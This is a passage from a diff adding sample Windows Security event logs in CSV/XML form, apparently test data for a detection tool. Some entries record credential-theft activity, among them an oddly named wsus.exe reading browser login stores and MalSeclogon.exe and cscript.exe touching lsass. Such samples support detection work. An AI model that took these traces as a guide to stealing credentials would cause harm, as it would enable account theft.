+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452909</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452908</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452907</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452906</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12802</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-08T22:11:34.340584Z"">
+    </TimeCreated>
+    <EventRecordID>314462</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""160"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x33392</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Process</Data>
+    <Data Name=""ObjectName"">\Device\HarddiskVolume1\Windows\System32\lsass.exe</Data>
+    <Data Name=""HandleId"">0x558</Data>
+    <Data Name=""AccessList"">%%4484 
+				</Data>
+    <Data Name=""AccessMask"">0x10</Data>
+    <Data Name=""ProcessId"">0x1688</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""ResourceAttributes"">-</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:50.134293Z"">
+    </TimeCreated>
+    <EventRecordID>4991</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""44"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:18.699755Z"">
+    </TimeCreated>
+    <EventRecordID>4990</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:05.308188Z"">
+    </TimeCreated>
+    <EventRecordID>4989</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:31:15.355063Z"">
+    </TimeCreated>
+    <EventRecordID>4988</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""68"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
diff --git a/source/samples/Sample_Process_Execution_Events.csv b/source/samples/Sample_Process_Execution_Events.csv
new file mode 100644
index 0000000..9b38ae6
--- /dev/null
+++ b/source/samples/Sample_Process_Execution_Events.csv
@@ -0,0 +1,4130 @@
+DateTime,timestamp,EventID,ProcessName,User,ParentProcessName,RawLog
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:08.723523Z"">
+    </TimeCreated>
+    <EventRecordID>329925</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x24e0</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-19</Data>
+    <Data Name=""TargetUserName"">LOCAL SERVICE</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e5</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.680005Z"">
+    </TimeCreated>
+    <EventRecordID>329921</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
+    <Data Name=""NewProcessId"">0x1494</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""TargetDomainName"">WORKGROUP</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.641209Z"">
+    </TimeCreated>
+    <EventRecordID>329920</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
+    <Data Name=""NewProcessId"">0x11e4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\conhost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x17b8</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.619364Z"">
+    </TimeCreated>
+    <EventRecordID>329919</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x17b8</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.462545Z"">
+    </TimeCreated>
+    <EventRecordID>329916</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x1bc4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.397814Z"">
+    </TimeCreated>
+    <EventRecordID>329914</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""NewProcessId"">0x21a4</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1937</Data>
+    <Data Name=""ProcessId"">0x2480</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:08.723523Z"">
